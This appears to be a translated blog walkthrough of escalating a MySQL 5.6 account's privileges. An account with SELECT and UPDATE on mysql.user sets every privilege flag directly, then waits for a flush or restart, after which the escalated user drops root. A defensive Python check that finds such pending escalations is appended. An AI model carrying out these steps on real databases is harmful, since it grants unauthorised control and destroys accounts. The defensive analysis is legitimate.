How to quietly escalate a MySQL user's privileges

Friendly reminder:

A successful unauthorized privilege escalation requires:
1. SELECT and UPDATE privileges on the mysql grant tables;
2. An inadvertent restart of the database server.

Version tested: 5.6.25

Prepare the malicious user:

grant update on mysql.user to heike@'localhost' identified by 'heike';

Log in to the database as heike@localhost:

mysql> select * from user;
ERROR 1142 (42000): SELECT command denied to user 'heike'@'localhost' for table 'user'

mysql> update mysql.user set user='test003' where user='test03';
ERROR 1143 (42000): SELECT command denied to user 'heike'@'localhost' for column 'user' in table 'user'

OK, that fails; additionally give heike@localhost the SELECT privilege on the user table:

mysql> grant select on mysql.user to heike@'localhost' identified by 'heike';
Query OK, 0 rows affected (0.00 sec)

Now heike@localhost can access the mysql.user table normally.

Prepare the test user:

mysql> show grants for test02@'localhost';
+---------------------------------------------------------------------------------------------------------------+
| Grants for test02@localhost                                                                                   |
+---------------------------------------------------------------------------------------------------------------+
| GRANT USAGE ON *.* TO 'test02'@'localhost' IDENTIFIED BY PASSWORD '*1556A6F65259CE3FBEA8489096F7797B4E0D5BEC' |
| GRANT SELECT ON `db_test`.`t1` TO 'test02'@'localhost'                                                        |
+---------------------------------------------------------------------------------------------------------------+
2 rows in set (0.00 sec)

test02@'localhost' only has the privilege to query the table db_test.t1.

Now use heike@localhost to escalate the privileges of test02@'localhost'.

Let's just give test02@'localhost' an enormous set of privileges. Execute as heike@localhost:

update mysql.user set Select_priv='Y', Insert_priv='Y', Update_priv='Y', Delete_priv='Y',
    Create_priv='Y', Drop_priv='Y', Reload_priv='Y', Shutdown_priv='Y', Process_priv='Y',
    File_priv='Y', Grant_priv='Y', References_priv='Y', Index_priv='Y', Alter_priv='Y',
    Show_db_priv='Y', Super_priv='Y', Create_tmp_table_priv='Y', Lock_tables_priv='Y',
    Execute_priv='Y', Repl_slave_priv='Y', Repl_client_priv='Y', Create_view_priv='Y',
    Show_view_priv='Y', Create_routine_priv='Y', Alter_routine_priv='Y', Create_user_priv='Y',
    Event_priv='Y', Trigger_priv='Y', Create_tablespace_priv='Y'
where user='test02' and host='localhost';

Query OK, 1 row affected (0.04 sec)
Rows matched: 1  Changed: 1  Warnings: 0

But if we look at test02@localhost's privileges again:

+----------------------------------------------------------------------------+
| Grants for test02@localhost                                                |
+----------------------------------------------------------------------------+
| GRANT USAGE ON *.* TO 'test02'@'localhost' IDENTIFIED BY PASSWORD <secret> |
| GRANT SELECT ON `db_test`.`t1` TO 'test02'@'localhost'                     |
+----------------------------------------------------------------------------+
2 rows in set (0.00 sec)

OK, the privileges have not changed. But don't lose heart.

Let's quietly wait until, one day, a user who has the privilege to run flush privileges executes:

mysql> flush privileges;

Now look at test02@localhost's privileges again:

mysql> show grants for test02@localhost;
+-------------------------------------------------------------------------------------------------------+
| Grants for test02@localhost                                                                           |
+-------------------------------------------------------------------------------------------------------+
| GRANT ALL PRIVILEGES ON *.* TO 'test02'@'localhost' IDENTIFIED BY PASSWORD <secret> WITH GRANT OPTION |
| GRANT SELECT ON `db_test`.`t1` TO 'test02'@'localhost'                                                |
+-------------------------------------------------------------------------------------------------------+
2 rows in set (0.00 sec)

At this point, do you think test02@localhost has successfully turned the tables and become a big shot?

Since you think so, let it drop `db_test`.`t1`:

mysql> drop table db_test.t1;
ERROR 1142 (42000): DROP command denied to user 'test02'@'localhost' for table 't1'

What? It cannot drop the table, and it even reports insufficient privileges. This must be a misunderstanding; let me try again:

mysql> select user,host,password from mysql.user;
ERROR 1142 (42000): SELECT command denied to user 'test02'@'localhost' for table 'user'

What? It cannot even SELECT. So much for the promised ALL PRIVILEGES!

Let me try once more: create a new ordinary table t2 and see whether test02@localhost can access it.

mysql> select * from db_test.t2;
ERROR 1142 (42000): SELECT command denied to user 'test02'@'localhost' for table 't2'

OK, so far the privileges of 'test02'@'localhost' have not changed in the slightest.

Next, restart the server:

>service mysqld restart

Try again:

mysql> drop user root@'::1';
Query OK, 0 rows affected (0.08 sec)

mysql> select user();
+------------------+
| user()           |
+------------------+
| test02@localhost |
+------------------+
1 row in set (0.00 sec)

Haha! Look at that. test02@localhost has now killed off the root user!
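A defender's check for the gap this post relies on: privileges written straight into mysql.user are not reflected in SHOW GRANTS until a FLUSH PRIVILEGES or a restart loads them, so comparing the on-disk row with the live grants exposes a pending escalation before it activates. This is an added example, not code from the post; the column-to-keyword mapping is my own, the sample row and grants are constructed from the post's output, and a real audit would feed it one `SELECT * FROM mysql.user` row and the `SHOW GRANTS` lines for each account.

```python
import re

# mysql.user columns whose GRANT keyword is not "drop _priv, _ -> space, upper-case".
_IRREGULAR = {"Grant_priv": "GRANT OPTION", "Show_db_priv": "SHOW DATABASES",
              "Create_tmp_table_priv": "CREATE TEMPORARY TABLES",
              "Repl_slave_priv": "REPLICATION SLAVE", "Repl_client_priv": "REPLICATION CLIENT"}
# Only "GRANT ... ON *.* TO ..." lines of SHOW GRANTS carry global privileges.
_GLOBAL = re.compile(r"^GRANT (.+?) ON \*\.\* TO .*?(?P<go> WITH GRANT OPTION)?$")


def column_to_privilege(col):
    """Map a mysql.user *_priv column name to its GRANT keyword."""
    return _IRREGULAR.get(col, col[:-5].replace("_", " ").upper())


def table_privileges(user_row):
    """Global privileges as stored on disk: every *_priv column set to 'Y'."""
    return {column_to_privilege(c) for c, v in user_row.items()
            if c.endswith("_priv") and v == "Y"}


def live_privileges(show_grants_lines, all_privs):
    """Global privileges the server is actually enforcing, parsed from SHOW GRANTS."""
    live = set()
    for line in show_grants_lines:
        m = _GLOBAL.match(line.strip())
        if not m:
            continue  # database- or table-level grant, not global
        names = m.group(1)
        if names == "ALL PRIVILEGES":
            live |= all_privs - {"GRANT OPTION"}
        elif names != "USAGE":
            live |= {n.strip() for n in names.split(",")}
        if m.group("go"):
            live.add("GRANT OPTION")
    return live


def pending_escalation(user_row, show_grants_lines):
    """Privileges written to mysql.user but not yet in effect: the set that the
    next FLUSH PRIVILEGES or restart would silently activate."""
    all_privs = {column_to_privilege(c) for c in user_row if c.endswith("_priv")}
    return sorted(table_privileges(user_row) - live_privileges(show_grants_lines, all_privs))


# Constructed sample (a subset of the *_priv columns): test02's row right after the
# direct UPDATE, beside what SHOW GRANTS still reported before any flush.
SAMPLE_ROW = {"User": "test02", "Host": "localhost", "Select_priv": "Y", "Insert_priv": "Y",
              "Drop_priv": "Y", "Super_priv": "Y", "Grant_priv": "Y",
              "Create_tmp_table_priv": "Y", "Repl_slave_priv": "Y", "Execute_priv": "N"}
SAMPLE_GRANTS = ["GRANT USAGE ON *.* TO 'test02'@'localhost' IDENTIFIED BY PASSWORD <secret>",
                 "GRANT SELECT ON `db_test`.`t1` TO 'test02'@'localhost'"]
```

A non-empty result for any account means someone has edited the grant table directly; on the post's test02 it lists every privilege the UPDATE wrote, and it drops to empty only once the ALL PRIVILEGES line appears in SHOW GRANTS.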

Original article: https://www.cnblogs.com/janehoo/p/5377264.html